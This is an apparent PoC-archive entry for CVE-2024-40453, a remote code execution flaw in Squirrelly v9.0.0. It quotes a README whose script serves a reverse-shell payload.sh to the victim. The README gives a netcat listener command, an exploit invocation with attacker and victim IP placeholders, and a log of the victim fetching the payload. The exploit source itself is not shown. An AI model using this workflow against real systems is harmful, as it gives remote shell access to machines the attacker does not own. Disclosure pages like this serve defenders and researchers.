POC详情: 47de78375badf64922caf485f123a456b068a2a3

来源
关联漏洞
标题: Squirrelly 安全漏洞 (CVE-2024-40453)
描述:Squirrelly是Squirrelly开源的一个用JavaScript实现的现代、可配置、超快的模板引擎。 Squirrelly v9.0.0版本存在安全漏洞,该漏洞源于通过组件options.varName发现包含代码注入漏洞。
描述
CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc
介绍
# CVE-2024-40453 - Squirrelly v9.0.0 RCE

## Disclaimer:
This script is for educational use only. 

Do not use it for illegal purposes. 

If you do, it’s entirely your responsibility; I am not liable for any misuse.

## Description

This script creates a reverse shell called `payload.sh` in the current directory.

Then it hosts an http server on port 80 for the victim to pull the `payload.sh` from.

A listener needs to be started on the attackers machine.

The http server shutdowns after 3 seconds to allow the victim to pull and execute the `payload.sh`

## EXPLANATION OF EXPLOIT 
Based on the following information, this POC was developed.
https://samuzora.com/posts/cve-2024-40453

## USAGE
Start your listener
```
rlwrap nc -nvlp 3000
```

Execute the payload
```
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>

python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!

```
文件快照

[4.0K] /data/pocs/47de78375badf64922caf485f123a456b068a2a3 ├── [2.3K] poc.py └── [1.2K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。